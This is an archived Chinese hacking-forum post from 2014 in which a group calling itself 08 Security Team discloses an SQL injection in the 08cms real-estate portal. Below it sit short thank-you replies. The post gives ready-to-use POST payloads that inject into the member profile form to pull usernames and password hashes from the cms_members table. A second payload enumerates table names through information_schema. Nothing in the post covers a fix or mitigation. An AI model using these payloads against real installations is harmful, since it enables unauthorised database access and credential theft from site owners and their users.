08cms房产门户系统注入漏洞

90_ 发表于 2014-7-31 20:40:49

##########################################
#Title ：08cms房产门户系统注入漏洞
#Team：08 Security Team
#Author ：08安全团队
#首发： 08安全团队
#######################################

这个漏洞在5月份已经审计出来了，现在将漏洞放出来。

注册一个账号会员资料->基本资料查看表单得到自己的 MID

http://127.0.0.1/house/adminm.php?action=memberinfo&mid=958 （mid）

POST提交 (自己的mid)
fmdata=1@qq.com&fmdata=\&fmdata=,XINGMING=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members limit 0,1) WHERE MID=958#&bsubmit=1

姓名处即可查看

ps：如何获取表名

,SUBJECT=(SELECT table_name FROM information_schema.TABLES WHERE TABLE_SCHEMA =DATABASE() LIMIT 1) WHERE aid=640292#

广岛秋泽 发表于 2014-7-31 21:19:45

谢谢分享~

擎天小猪 发表于 2014-7-31 21:36:48

谢谢90分享

nextdoor 发表于 2014-7-31 21:50:02

顶顶，谢谢分享

lainiang55 发表于 2014-7-31 23:08:46

xiaobo2014 发表于 2014-8-1 10:22:08

技术不行，不知道怎么弄。。

老黑发表于 2014-8-3 01:42:33

顶顶，谢谢分享

Alt93 发表于 2014-8-3 09:42:36

收藏入库~

blck 发表于 2014-8-3 21:46:15

注入语句构造过程也不详细说下

hjadhfkj 发表于 2014-8-9 17:03:33

页: [1] 2

红客联盟 - 由08安全团队运营's Archiver

08cms房产门户系统注入漏洞